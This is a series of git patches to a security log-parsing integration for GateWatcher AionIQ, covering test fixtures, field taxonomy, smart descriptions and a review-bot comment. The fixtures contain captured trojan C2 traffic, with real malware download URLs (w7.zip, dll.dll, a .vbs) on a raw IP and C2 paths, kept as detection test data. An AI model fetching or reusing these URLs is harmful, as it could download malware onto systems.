www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}" + } }, "expected": { "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAG
sSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"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\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET 
/bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}", diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index ed0cfe547..2e1580dce 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": 
"{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}" + } }, "expected": { "message": 
"{\"event_type\":\"fileinfo\",\"proto\":\"TCP\",\"http\":{\"protocol\":\"HTTP/1.1\",\"url\":\"/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"hostname\":\"cdnfiles.4shared.com\",\"status\":200,\"length\":1088,\"http_content_type\":\"APPLICATION/OCTET-STREAM\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.469Z\",\"uuid\":\"24231245-276c-4509-9437-016b82f88c7c\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.998Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.998Z\",\"@version\":\"1\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"fileinfo\":{\"size\":1088,\"filename\":\"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs\",\"state\":\"CLOSED\",\"sha256\":\"f31faae778ecfee8e27041309444468a37ad7681d42d7972faa92fe2056721df\",\"magic\":\"Little-endian UTF-16 Unicode text, with CRLF line terminators\",\"sid\":[],\"stored\":false,\"tx_id\":1,\"gaps\":false,\"md5\":\"d526c8e4ad7ab6d80baeb839976b7c80\"},\"dest_port\":8550,\"src_port\":16122,\"app_proto\":\"http\"}", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 9a3ca081a..4da5dbc30 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 
GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, 
*/*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\
":\"gcenter-xxxxxxxxxx.domain.local\"}" + } }, "expected": { "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 
GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", From 44cd3ae8109baa1768e09e3472738d1dbccf9428 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:15:23 +0200 Subject: [PATCH 068/317] fix(GateWatcher): fix parsing of DGA events and add a smart-description --- GateWatcher/aioniq/_meta/fields.yml | 5 ----- GateWatcher/aioniq/_meta/smart-descriptions.json | 12 ++++++++++++ GateWatcher/aioniq/ingest/parser.yml | 2 +- GateWatcher/aioniq/tests/dga.json | 11 ++++++++--- 4 files changed, 21 insertions(+), 9 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 01ffdaf05..e970bfffc 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -35,11 +35,6 @@ gatewatcher.dnp3: name: gatewatcher.dnp3 type: text -gatewatcher.domain_name: - description: This field represents the domain name found in a dga alert - name: gatewatcher.domain_name - type: text - gatewatcher.email: description: This field represents the email field name: gatewatcher.email diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json index 6ef36657f..3ec572a81 100644 --- a/GateWatcher/aioniq/_meta/smart-descriptions.json +++ b/GateWatcher/aioniq/_meta/smart-descriptions.json @@ -82,5 +82,17 @@ "value": "powershell" } ] + }, + { + "value": "The domain {destination.domain} was detected as having been generated by a domain generation algorithm", + "conditions": [ + { + "field": "gatewatcher.event_type", + "value": "dga" + }, + { + "field": "destination.domain" + } + ] } ] diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 93f390a79..4db8bf1dc 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -163,7 +163,7 @@ stages: actions: - set: gatewatcher.type: "{{json_load.message.type}}" - gatewatcher.domain_name: "{{json_load.message.domain_name}}" + destination.domain: "{{json_load.message.domain_name}}" gatewatcher.probability: "{{json_load.message.probability}}" gatewatcher.matched_event: "{{json_load.message.matched_event}}" retrohunt: diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index 7516b7e85..b9db082ca 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json 
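Review bot: The `set` action now writes `destination.domain` while the same commit deletes the `gatewatcher.domain_name` taxonomy entry, so any existing detection rule, saved filter or dashboard keyed on `gatewatcher.domain_name` silently stops matching DGA events. Consider emitting both for a deprecation window by keeping `gatewatcher.domain_name: "{{json_load.message.domain_name}}"` next to the new `destination.domain` line and leaving the fields.yml entry in place with a deprecation note. The updated dga.json fixture also shows `destination.address` switching from the resolver IP `2.2.2.2` to the DGA domain; that is consistent with how ECS defines `.address`, but rules that compared `destination.address` against IP lists will need to move to `destination.ip`, which is worth calling out in the changelog. The enclosing `actions` stage starts outside the hunk.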
@@ -19,12 +19,14 @@ }, "@timestamp": "2023-03-22T10:46:08.487000Z", "destination": { - "address": "2.2.2.2", + "address": "pgoadcmgqfacj.com", + "domain": "pgoadcmgqfacj.com", "ip": "2.2.2.2", - "port": 53 + "port": 53, + "registered_domain": "pgoadcmgqfacj.com", + "top_level_domain": "com" }, "gatewatcher": { - "domain_name": "pgoadcmgqfacj.com", "event_type": "dga", "flow_id": "729468278572", "gcap": "gcap-xxxxxxxx.domain.local", @@ -41,6 +43,9 @@ "version": "0.2" }, "related": { + "hosts": [ + "pgoadcmgqfacj.com" + ], "ip": [ "1.1.1.1", "2.2.2.2" From c0df60a2a1416c35ef229ef78b3dadb0133db124 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 11:39:38 +0200 Subject: [PATCH 069/317] fix(GateWatcher): add smart-description for retrohunt events --- GateWatcher/aioniq/_meta/smart-descriptions.json | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json index 3ec572a81..cd51acc82 100644 --- a/GateWatcher/aioniq/_meta/smart-descriptions.json +++ b/GateWatcher/aioniq/_meta/smart-descriptions.json @@ -94,5 +94,20 @@ "field": "destination.domain" } ] + }, + { + "value": "{gatewatcher.event_type}: the {gatewatcher.ioc_type} indicator {gatewatcher.ioc_value} raised a detection", + "conditions": [ + { + "field": "gatewatcher.event_type", + "value": "retrohunt" + }, + { + "field": "gatewatcher.ioc_value" + }, + { + "field": "gatewatcher.ioc_type" + } + ] } ] From f635abfecf71268e054d0c6da6cc3e6b6c26f672 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 20 Sep 2024 11:05:01 +0200 Subject: [PATCH 070/317] fix(GateWatcher): fix taxonomy --- GateWatcher/aioniq/_meta/fields.yml | 2 +- GateWatcher/aioniq/tests/malcore.json | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index e970bfffc..d0d85f7f6 100644 --- a/GateWatcher/aioniq/_meta/fields.yml 
+++ b/GateWatcher/aioniq/_meta/fields.yml @@ -154,7 +154,7 @@ gatewatcher.krb5: gatewatcher.malcore.code: description: Return code of the malcore analysis name: gatewatcher.malcore.code - type: number + type: keyword gatewatcher.malcore.detail_threat_found: description: Type of the detected threat diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ebc7c83d1..ba95cc211 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -42,7 +42,7 @@ "gcap": "gcap-xxxxxxxx.domain.local", "gcenter": "gcenter-xxxxxxxx.domain.local", "malcore": { - "code": 1, + "code": "1", "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF" }, "reporting_token": "No GBOX", From e7b942179a209440aca02f18afe823033eda9ccd Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 20 Sep 2024 13:16:56 +0300 Subject: [PATCH 071/317] Add smart desc for `ignoring request` --- .../freeradius/_meta/smart-descriptions.json | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/FreeRADIUS/freeradius/_meta/smart-descriptions.json b/FreeRADIUS/freeradius/_meta/smart-descriptions.json index 2f46e4e4b..9ee11971a 100644 --- a/FreeRADIUS/freeradius/_meta/smart-descriptions.json +++ b/FreeRADIUS/freeradius/_meta/smart-descriptions.json 
